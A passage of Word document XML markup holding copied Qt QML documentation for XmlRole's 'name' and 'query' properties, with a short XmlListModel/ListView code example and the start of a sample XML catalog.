          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is called.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="002736BE" w:rsidRDefault="001B046D" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>See also</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1616" w:anchor="xmllistmodel" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="14310" w:type="dxa"/>
        <w:tblBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EEEEEE"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="14310"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidTr="001B046D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1335" w:name="name-prop"/>
            <w:bookmarkEnd w:id="1335"/>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name for the role</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This name is used to access the model data for this role.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For example, the following model has a role named "title", which can be accessed from the view's delegate:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="00490E7E"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617" w:history="1">
        <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B046D"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id</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xmlModel</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// ...</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hyperlink r:id="rId1618" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>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name</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"title"</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query</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"title/string()"</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="00490E7E"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619" w:history="1">
        <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B046D"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model</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xmlModel</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rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> text</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> title </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="14310" w:type="dxa"/>
        <w:tblBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EEEEEE"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="14310"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidTr="001B046D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1336" w:name="query-prop"/>
            <w:bookmarkEnd w:id="1336"/>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>query</w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relative XPath expression query for this role</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>query must be relative</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; it </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot start with a '/'</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, if there is an XML document like this:</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un"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml version</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"1.0"</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"iso-8859-1"</w:t>
      </w:r>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tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;catalog&gt;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&lt;book</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Online"</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
